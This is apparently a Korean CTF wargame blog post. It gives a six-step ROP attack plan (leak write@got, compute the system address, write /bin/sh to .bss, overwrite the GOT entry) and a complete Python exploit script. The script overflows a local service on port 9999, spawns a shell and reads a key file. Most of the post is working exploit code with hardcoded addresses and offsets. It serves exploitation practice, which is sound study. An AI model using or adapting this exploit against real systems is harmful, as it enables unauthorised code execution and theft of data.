공격 시나리오
1. write 함수를 이용하여 write@got 주소 leak
2. write와 system함수의 거리를 이용하여 system 함수 주소 유추
3. read@plt를 이용하여 bss섹션에 /bin/sh 쓰기
4. read@plt를 이용하여 write@got에 system함수를 overwrite
5. overwrite한 write@got를 이용하여 system함수 호출
6. 명령 실행
[exploit code]
from socket import *
from struct import *
p = lambda x:pack("<L", x)
up = lambda x:unpack("<L", x)[0]
bss = p(0x08049628)
pppr = p(0x080484b6)
write_plt = p(0x0804830c)
write_got = p(0x08049614)
read_plt = p(0x0804832c)
offset = 0x9b3e0
cmd = "/bin/sh"
s = socket(AF_INET, SOCK_STREAM)
s.connect(("localhost", 9999))
#write@got leak
payload = ""
payload += "a" * 140
payload += write_plt
payload += pppr
payload += p(1)
payload += write_got
payload += p(4)
# /bin/sh -> bss section
payload += read_plt
payload += pppr
payload += p(0)
payload += bss
payload += p(len(cmd))
#write@got overwriting
payload += read_plt
payload += pppr
payload += p(0)
payload += write_got
payload += p(4)
#call write(system)
payload += write_plt
payload += "aaaa"
payload += bss
s.send(payload + "\n")
write = up(s.recv(4))
system = write - offset
print "write = "+hex(write)
print "system = "+hex(system)
s.send(cmd)
s.send(p(system))
s.send("cat /home/hide/rop/key\n")
print s.recv(1024)
s.close()
서버환경 : Ubuntu 14
'Wargame(CTF)' 카테고리의 다른 글
| Lord of SQL Injection Gremlin ~ AllClear (0) | 2016.02.18 |
|---|---|
| LOS2 ing... (0) | 2015.11.25 |
| Codeshell (0) | 2015.08.10 |
| YetAnotherSQL (0) | 2015.08.07 |
| flag (0) | 2015.08.06 |